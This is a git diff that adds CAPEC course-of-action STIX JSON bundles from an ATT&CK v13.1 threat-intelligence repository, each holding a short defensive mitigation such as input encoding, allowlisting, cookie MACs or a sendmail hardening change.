0000000000000000000000000000000000000000..e9e615128fb4659368a2cc42c1faafed2321ec14 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--0a399b26-688b-4a78-8d74-4d815dbc37ad.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--18b4a8f7-7f86-45ff-9014-80662f4b5211", + "objects": [ + { + "created": "2017-01-04T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Include \"hosts file\"/IP address in the application", + "id": "course-of-action--0a399b26-688b-4a78-8d74-4d815dbc37ad", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-598-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--0a42ee9c-7f1e-494d-9924-1d1d6accfbe6.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--0a42ee9c-7f1e-494d-9924-1d1d6accfbe6.json new file mode 100644 index 0000000000000000000000000000000000000000..fd5ec91e3dc495418293c1b566533795fa47d1d0 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--0a42ee9c-7f1e-494d-9924-1d1d6accfbe6.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--53d02dd2-b888-4836-86b5-0338308dac75", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure all content that is delivered to client is sanitized against an acceptable content specification.", + "id": "course-of-action--0a42ee9c-7f1e-494d-9924-1d1d6accfbe6", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-19-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--0a849fd5-2365-44ad-b7db-fd394c0d1ec7.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--0a849fd5-2365-44ad-b7db-fd394c0d1ec7.json new file mode 100644 index 0000000000000000000000000000000000000000..64698e11c0305c2d1da7f6ccc6f33be6b731af06 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--0a849fd5-2365-44ad-b7db-fd394c0d1ec7.json 
@@ -0,0 +1,20 @@ +{ + "id": "bundle--bf85ae56-a66f-4ceb-b11b-ef536f83a50a", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Input should be encoded prior to use in commands to make sure command related characters are not treated as part of the command. For example, quotation characters may need to be encoded so that the application does not treat the quotation as a delimiter.", + "id": "course-of-action--0a849fd5-2365-44ad-b7db-fd394c0d1ec7", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-248-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--0b18ed90-3e15-4da1-8a4a-dab1030a5dc4.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--0b18ed90-3e15-4da1-8a4a-dab1030a5dc4.json new file mode 100644 index 0000000000000000000000000000000000000000..1c3ec2743121dccc0023fc684214f73155404904 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--0b18ed90-3e15-4da1-8a4a-dab1030a5dc4.json 
@@ -0,0 +1,20 @@ +{ + "id": "bundle--4b5130a4-29a0-4237-82c0-14a543821ef4", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Normalize, filter and use an allowlist for any input that will be included in any subsequent web pages or back end operations.", + "id": "course-of-action--0b18ed90-3e15-4da1-8a4a-dab1030a5dc4", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-247-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--0b60f2ad-a597-4f6d-8433-af47d2743270.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--0b60f2ad-a597-4f6d-8433-af47d2743270.json new file mode 100644 index 0000000000000000000000000000000000000000..f8d2dff6ed4cc302f27e967192e30a116f8d1bab --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--0b60f2ad-a597-4f6d-8433-af47d2743270.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--e52a49e1-04cb-4c6e-a2e4-5732d0f7cd53", + "objects": [ + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Conduct detailed vendor assessment before acquiring COTS hardware.", + "id": "course-of-action--0b60f2ad-a597-4f6d-8433-af47d2743270", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-671-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--0ba5f98c-6878-4132-908b-4b27bd6e56c3.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--0ba5f98c-6878-4132-908b-4b27bd6e56c3.json new file mode 100644 index 0000000000000000000000000000000000000000..f4e9c196d2825a5cb62fff36439ce449bb496f8f --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--0ba5f98c-6878-4132-908b-4b27bd6e56c3.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--8031045c-7cca-47a5-982b-5e21b49e8f21", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Educate designers, developers, engineers, etc. on social engineering attacks to avoid downloading malicious software via attacks such as phishing attacks", + "id": "course-of-action--0ba5f98c-6878-4132-908b-4b27bd6e56c3", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-537-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--0bb278f4-3628-416a-8686-c55572ab5d65.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--0bb278f4-3628-416a-8686-c55572ab5d65.json new file mode 100644 index 0000000000000000000000000000000000000000..ddee91b2d4b8473bbf3b101ded32fe5677481e14 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--0bb278f4-3628-416a-8686-c55572ab5d65.json 
@@ -0,0 +1,20 @@
+{
+ "id": "bundle--2155711c-a0f6-4a9f-95fc-5e660d165e5f",
+ "objects": [
+ {
+ "created": "2022-09-29T00:00:00.000Z",
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
+ "description": "Implementation: Port Security and DHCP snooping",
+ "id": "course-of-action--0bb278f4-3628-416a-8686-c55572ab5d65",
+ "modified": "2022-09-29T00:00:00.000Z",
+ "name": "coa-697-1",
+ "object_marking_refs": [
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
+ ],
+ "type": "course-of-action",
+ "x_capec_version": "3.9"
+ }
+ ],
+ "spec_version": "2.0",
+ "type": "bundle"
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--0bc589af-7ac3-4771-b1db-defb88ba61b5.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--0bc589af-7ac3-4771-b1db-defb88ba61b5.json
new file mode 100644
index 0000000000000000000000000000000000000000..0403d7be4ac4ecc38b30951ad722f0003eb3141d
--- /dev/null
+++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--0bc589af-7ac3-4771-b1db-defb88ba61b5.json
@@ -0,0 +1,20 @@
+{
+ "id": "bundle--7b9716b8-1a78-4b27-9fb2-d87f6738117a",
+ "objects": [
+ {
+ "created": "2014-06-23T00:00:00.000Z",
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
+ "description": "Configuration: back-end HTTP agents reject ambiguous requests and close the network connection.",
+ "id": "course-of-action--0bc589af-7ac3-4771-b1db-defb88ba61b5",
+ "modified": "2022-09-29T00:00:00.000Z",
+ "name": "coa-105-2",
+ "object_marking_refs": [
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
+ ],
+ "type": "course-of-action",
+ "x_capec_version": "3.9"
+ }
+ ],
+ "spec_version": "2.0",
+ "type": "bundle"
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--0c139321-7054-4d7b-92ff-f021b5ce6fc0.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--0c139321-7054-4d7b-92ff-f021b5ce6fc0.json
new file mode 100644
index 0000000000000000000000000000000000000000..49719488b11658754cabebb81cf1d973c9c90ae9
--- /dev/null
+++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--0c139321-7054-4d7b-92ff-f021b5ce6fc0.json
@@ -0,0 +1,20 @@
+{
+ "id": "bundle--e901f6ac-f9ac-4805-b363-29287a9b2715",
+ "objects": [
+ {
+ "created": "2014-06-23T00:00:00.000Z",
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
+ "description": "The use of HMAC to hash the response from the server can also be used to thwart reflection. The server responds by returning its own challenge as well as hashing the client's challenge, its own challenge and the pre-shared secret. Requiring the client to respond with the HMAC of the two challenges ensures that only the possessor of a valid pre-shared secret can successfully hash in the two values.",
+ "id": "course-of-action--0c139321-7054-4d7b-92ff-f021b5ce6fc0",
+ "modified": "2021-10-21T00:00:00.000Z",
+ "name": "coa-90-1",
+ "object_marking_refs": [
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
+ ],
+ "type": "course-of-action",
+ "x_capec_version": "3.9"
+ }
+ ],
+ "spec_version": "2.0",
+ "type": "bundle"
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--0c769b9e-b3fa-410a-b87b-ef79448b95b2.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--0c769b9e-b3fa-410a-b87b-ef79448b95b2.json
new file mode 100644
index 0000000000000000000000000000000000000000..217b9adfef67f3c86844a89375c8f8d7caf1527f
--- /dev/null
+++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--0c769b9e-b3fa-410a-b87b-ef79448b95b2.json
@@ -0,0 +1,20 @@
+{
+ "id": "bundle--9eab0c73-0144-46eb-a69a-bb756a3d7657",
+ "objects": [
+ {
+ "created": "2014-06-23T00:00:00.000Z",
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
+ "description": "To mitigate this type of an attack, explicit intents should be used whenever sensitive data is being sent. An explicit intent is delivered to a specific application as declared within the intent, whereas the Android operating system determines who receives an implicit intent which could potentially be a malicious application. If an implicit intent must be used, then it should be assumed that the intent will be received by an unknown application and any response should be treated accordingly. Implicit intents should never be used for inter-application communication.",
+ "id": "course-of-action--0c769b9e-b3fa-410a-b87b-ef79448b95b2",
+ "modified": "2021-10-21T00:00:00.000Z",
+ "name": "coa-499-0",
+ "object_marking_refs": [
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
+ ],
+ "type": "course-of-action",
+ "x_capec_version": "3.9"
+ }
+ ],
+ "spec_version": "2.0",
+ "type": "bundle"
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--0cf8b19c-92c1-410d-bd1f-e7474d2878a0.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--0cf8b19c-92c1-410d-bd1f-e7474d2878a0.json
new file mode 100644
index 0000000000000000000000000000000000000000..ac1ab3fec29b5779e27f27056234e05843d489cb
--- /dev/null
+++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--0cf8b19c-92c1-410d-bd1f-e7474d2878a0.json
@@ -0,0 +1,20 @@
+{
+ "id": "bundle--e4acd3ed-c9d8-44ed-97eb-730d37273a5d",
+ "objects": [
+ {
+ "created": "2014-06-23T00:00:00.000Z",
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
+ "description": "Do not download software from untrusted sources",
+ "id": "course-of-action--0cf8b19c-92c1-410d-bd1f-e7474d2878a0",
+ "modified": "2022-02-22T00:00:00.000Z",
+ "name": "coa-537-2",
+ "object_marking_refs": [
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
+ ],
+ "type": "course-of-action",
+ "x_capec_version": "3.7"
+ }
+ ],
+ "spec_version": "2.0",
+ "type": "bundle"
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--0d0e8c85-a2de-43ee-aa5a-3fb5d75c14c8.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--0d0e8c85-a2de-43ee-aa5a-3fb5d75c14c8.json
new file mode 100644
index 0000000000000000000000000000000000000000..68c894f5fec08a7c12e1c6616dcaf0fe9309ef67
--- /dev/null
+++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--0d0e8c85-a2de-43ee-aa5a-3fb5d75c14c8.json
@@ -0,0 +1,20 @@
+{
+ "id": "bundle--08544a69-aa10-4c4a-9032-72c627970801",
+ "objects": [
+ {
+ "created": "2014-06-23T00:00:00.000Z",
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
+ "description": "\n Disable the 7 to 8 bit conversion. This can be done by removing the F=9 flag from all Mailer specifications in the sendmail.cf file.\n For example, a sendmail.cf file with these changes applied should look similar to (depending on your system and configuration):\n Mlocal, P=/usr/libexec/mail.local, F=lsDFMAw5:/|@qrmn, S=10/30, R=20/40,T=DNS/RFC822/X-Unix,A=mail -d $u\n Mprog, P=/bin/sh, F=lsDFMoqeu, S=10/30, R=20/40,D=$z:/,T=X-Unix,A=sh -c $u\n \n This can be achieved for the \"Mlocal\" and \"Mprog\" Mailers by modifying the \".mc\" file to include the following lines:\n define(`LOCAL_MAILER_FLAGS',ifdef(`LOCAL_MAILER_FLAGS',`translit(LOCAL_MAILER_FLAGS, `9')',`rmn'))\n \n define(`LOCAL_SHELL_FLAGS',ifdef(`LOCAL_SHELL_FLAGS',`translit(LOCAL_SHELL_FLAGS, `9')',`eu'))\n \n \n and then rebuilding the sendmail.cf file using m4(1).\n From \"Exploiting Software\", please see reference below.\n ",
+ "id": "course-of-action--0d0e8c85-a2de-43ee-aa5a-3fb5d75c14c8",
+ "modified": "2021-10-21T00:00:00.000Z",
+ "name": "coa-42-1",
+ "object_marking_refs": [
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
+ ],
+ "type": "course-of-action",
+ "x_capec_version": "3.7"
+ }
+ ],
+ "spec_version": "2.0",
+ "type": "bundle"
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--0d393965-6ce2-4c90-8900-0e83b807d807.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--0d393965-6ce2-4c90-8900-0e83b807d807.json
new file mode 100644
index 0000000000000000000000000000000000000000..cc5b49ca3414b83ebfcddfbe89fe8ef9aed1c794
--- /dev/null
+++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--0d393965-6ce2-4c90-8900-0e83b807d807.json
@@ -0,0 +1,20 @@
+{
+ "id": "bundle--dcac53fd-fed4-488c-8a4d-134e8a3cfc53",
+ "objects": [
+ {
+ "created": "2014-06-23T00:00:00.000Z",
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
+ "description": "Design: Generate and validate MAC for cookies",
+ "id": "course-of-action--0d393965-6ce2-4c90-8900-0e83b807d807",
+ "modified": "2022-09-29T00:00:00.000Z",
+ "name": "coa-31-1",
+ "object_marking_refs": [
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
+ ],
+ "type": "course-of-action",
+ "x_capec_version": "3.9"
+ }
+ ],
+ "spec_version": "2.0",
+ "type": "bundle"
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--0d8de0b8-e9fd-44b2-8f1f-f8aae79949be.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--0d8de0b8-e9fd-44b2-8f1f-f8aae79949be.json
new file mode 100644
index 0000000000000000000000000000000000000000..161ac044b93f26de3ef2e820a8b7f1c9d9eda2f2
--- /dev/null
+++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--0d8de0b8-e9fd-44b2-8f1f-f8aae79949be.json
@@ -0,0 +1,20 @@
+{
+ "id": "bundle--45910ef6-bbf6-4c18-80f7-f344c968fad7",
+ "objects": [
+ {
+ "created": "2014-06-23T00:00:00.000Z",
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
+ "description": "\n In a J2EE setting, administrators can associate a role that is impossible for the authenticator to grant users, such as \"NoAccess\", with all Servlets to which access is guarded by a limited number of servlets visible to, and accessible by, the user.\n Having done so, any direct access to those protected Servlets will be prohibited by the web container.\n In a more general setting, the administrator must mark every resource besides the ones supposed to be exposed to the user as accessible by a role impossible for the user to assume. The default security setting must be to deny access and then grant access only to those resources intended by business logic.\n ",
+ "id": "course-of-action--0d8de0b8-e9fd-44b2-8f1f-f8aae79949be",
+ "modified": "2022-09-29T00:00:00.000Z",
+ "name": "coa-1-0",
+ "object_marking_refs": [
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
+ ],
+ "type": "course-of-action",
+ "x_capec_version": "3.9"
+ }
+ ],
+ "spec_version": "2.0",
+ "type": "bundle"
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--0deacbb8-6bed-42d8-843e-2f7ae16d93a7.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--0deacbb8-6bed-42d8-843e-2f7ae16d93a7.json
new file mode 100644
index 0000000000000000000000000000000000000000..0f60ee2e89bfcb9768c383144b20bffaf7821248
--- /dev/null
+++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--0deacbb8-6bed-42d8-843e-2f7ae16d93a7.json
@@ -0,0 +1,20 @@
+{
+ "id": "bundle--6a99dd05-6d85-42e4-9bd0-1406b61d1a92",
+ "objects": [
+ {
+ "created": "2014-06-23T00:00:00.000Z",
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
+ "description": "Ensure good compartmentalization in the system to provide protected areas that can be trusted.",
+ "id": "course-of-action--0deacbb8-6bed-42d8-843e-2f7ae16d93a7",
+ "modified": "2020-07-30T00:00:00.000Z",
+ "name": "coa-27-3",
+ "object_marking_refs": [
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
+ ],
+ "type": "course-of-action",
+ "x_capec_version": "3.9"
+ }
+ ],
+ "spec_version": "2.0",
+ "type": "bundle"
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--0dfabd41-428e-43f9-93f8-078e6987d31c.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--0dfabd41-428e-43f9-93f8-078e6987d31c.json
new file mode 100644
index 0000000000000000000000000000000000000000..77104f6477974703adc4f905c4bc2f3079c91b71
--- /dev/null
+++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--0dfabd41-428e-43f9-93f8-078e6987d31c.json
@@ -0,0 +1,20 @@
+{
+ "id": "bundle--239ca0ba-7bbe-49df-92fc-2f8a1175509e",
+ "objects": [
+ {
+ "created": "2018-07-31T00:00:00.000Z",
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
+ "description": "Patch installed applications as soon as new updates become available.",
+ "id": "course-of-action--0dfabd41-428e-43f9-93f8-078e6987d31c",
+ "modified": "2021-06-24T00:00:00.000Z",
+ "name": "coa-634-1",
+ "object_marking_refs": [
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
+ ],
+ "type": "course-of-action",
+ "x_capec_version": "3.9"
+ }
+ ],
+ "spec_version": "2.0",
+ "type": "bundle"
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--0dfd5de3-6691-47d2-abfd-21299e9f040b.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--0dfd5de3-6691-47d2-abfd-21299e9f040b.json
new file mode 100644
index 0000000000000000000000000000000000000000..95616920c9f96e6bfb01f287363be8e71b259a3f
--- /dev/null
+++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--0dfd5de3-6691-47d2-abfd-21299e9f040b.json
@@ -0,0 +1,20 @@
+{
+ "id": "bundle--1ac6507c-df65-4594-90c7-b6ff2930866f",
+ "objects": [
+ {
+ "created": "2014-06-23T00:00:00.000Z",
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
+ "description": "Do not expose environment variable to the user.",
+ "id": "course-of-action--0dfd5de3-6691-47d2-abfd-21299e9f040b",
+ "modified": "2022-09-29T00:00:00.000Z",
+ "name": "coa-10-0",
+ "object_marking_refs": [
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
+ ],
+ "type": "course-of-action",
+ "x_capec_version": "3.9"
+ }
+ ],
+ "spec_version": "2.0",
+ "type": "bundle"
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--0f461277-141d-4b7f-8f50-ce7f5ee71f4c.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--0f461277-141d-4b7f-8f50-ce7f5ee71f4c.json
new file mode 100644
index 0000000000000000000000000000000000000000..8f2956c22366adfa0320f20c8db4f837f65917af
--- /dev/null
+++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--0f461277-141d-4b7f-8f50-ce7f5ee71f4c.json
@@ -0,0 +1,20 @@
+{
+ "id": "bundle--0c03a687-c66f-458a-9301-80f2bfb3f660",
+ "objects": [
+ {
+ "created": "2014-06-23T00:00:00.000Z",
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
+ "description": "Implementation: Hide cookie's software information filed.",
+ "id": "course-of-action--0f461277-141d-4b7f-8f50-ce7f5ee71f4c",
+ "modified": "2022-09-29T00:00:00.000Z",
+ "name": "coa-170-5",
+ "object_marking_refs": [
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
+ ],
+ "type": "course-of-action",
+ "x_capec_version": "3.9"
+ }
+ ],
+ "spec_version": "2.0",
+ "type": "bundle"
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--0f8223ee-d815-41b0-8f0f-a9b23de56d8b.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--0f8223ee-d815-41b0-8f0f-a9b23de56d8b.json
new file mode 100644
index 0000000000000000000000000000000000000000..ac0d1cf574ddc084397f7cd1f4971e975d6dea57
--- /dev/null
+++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--0f8223ee-d815-41b0-8f0f-a9b23de56d8b.json
@@ -0,0 +1,20 @@
+{
+ "id": "bundle--8a06e919-3fc3-42ac-b1c6-238a7986f7b6",
+ "objects": [
+ {
+ "created": "2014-06-23T00:00:00.000Z",
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
+ "description": "Carefully control access to physical log files.",
+ "id": "course-of-action--0f8223ee-d815-41b0-8f0f-a9b23de56d8b",
+ "modified": "2022-09-29T00:00:00.000Z",
+ "name": "coa-93-0",
+ "object_marking_refs": [
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
+ ],
+ "type": "course-of-action",
+ "x_capec_version": "3.9"
+ }
+ ],
+ "spec_version": "2.0",
+ "type": "bundle"
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--0f87d25c-d219-4247-a96c-10364d611d0b.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--0f87d25c-d219-4247-a96c-10364d611d0b.json
new file mode 100644
index 0000000000000000000000000000000000000000..e4a8aaa01662b87173ba19162cdc437b6f24a174
--- /dev/null
+++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--0f87d25c-d219-4247-a96c-10364d611d0b.json
@@ -0,0 +1,20 @@
+{
+ "id": "bundle--a79a5cd2-5cb6-46ad-bb74-a11a277d38a0",
+ "objects": [
+ {
+ "created": "2014-06-23T00:00:00.000Z",
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
+ "description": "Because Symlink can be modified by an adversary, make sure that the ones you read are located in protected directories.",
+ "id": "course-of-action--0f87d25c-d219-4247-a96c-10364d611d0b",
+ "modified": "2022-09-29T00:00:00.000Z",
+ "name": "coa-45-1",
+ "object_marking_refs": [
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
+ ],
+ "type": "course-of-action",
+ "x_capec_version": "3.9"
+ }
+ ],
+ "spec_version": "2.0",
+ "type": "bundle"
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--0fd28b29-b808-4832-90eb-f5f753cb6353.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--0fd28b29-b808-4832-90eb-f5f753cb6353.json
new file mode 100644
index 0000000000000000000000000000000000000000..8ad1b6249cea10a31445fd73d801b778914f1d7d
--- /dev/null
+++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--0fd28b29-b808-4832-90eb-f5f753cb6353.json
@@ -0,0 +1,20 @@
+{
+ "id": "bundle--06cf8cf8-fc31-4ccd-b32d-f59fe84fc22b",
+ "objects": [
+ {
+ "created": "2014-06-23T00:00:00.000Z",
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
+ "description": "Operation: When maintaining an authenticated session with a privileged target system, do not use the same browser to navigate to unfamiliar sites to perform other activities. Finish working with the target system and logout first before proceeding to other tasks.",
+ "id": "course-of-action--0fd28b29-b808-4832-90eb-f5f753cb6353",
+ "modified": "2022-09-29T00:00:00.000Z",
+ "name": "coa-222-1",
+ "object_marking_refs": [
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
+ ],
+ "type": "course-of-action",
+ "x_capec_version": "3.9"
+ }
+ ],
+ "spec_version": "2.0",
+ "type": "bundle"
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--0ff4be5f-0c27-443a-9c06-f1273aacf899.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--0ff4be5f-0c27-443a-9c06-f1273aacf899.json
new file mode 100644
index 0000000000000000000000000000000000000000..dc24e39c985c538ba49a29ed73542a52a69ba130
--- /dev/null
+++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--0ff4be5f-0c27-443a-9c06-f1273aacf899.json
@@ -0,0 +1,20 @@
+{
+ "id": "bundle--05a7d31b-7e9d-4a79-82a0-eb9ac1a92c84",
+ "objects": [
+ {
+ "created": "2014-06-23T00:00:00.000Z",
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
+ "description": "Design: Do not program input values directly on command shell, instead treat user input as guilty until proven innocent. Build a function that takes user input and converts it to applications specific types and values, stripping or filtering out all unauthorized commands and characters in the process.",
+ "id": "course-of-action--0ff4be5f-0c27-443a-9c06-f1273aacf899",
+ "modified": "2021-06-24T00:00:00.000Z",
+ "name": "coa-6-0",
+ "object_marking_refs": [
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
+ ],
+ "type": "course-of-action",
+ "x_capec_version": "3.9"
+ }
+ ],
+ "spec_version": "2.0",
+ "type": "bundle"
+}
\ No newline at end of file
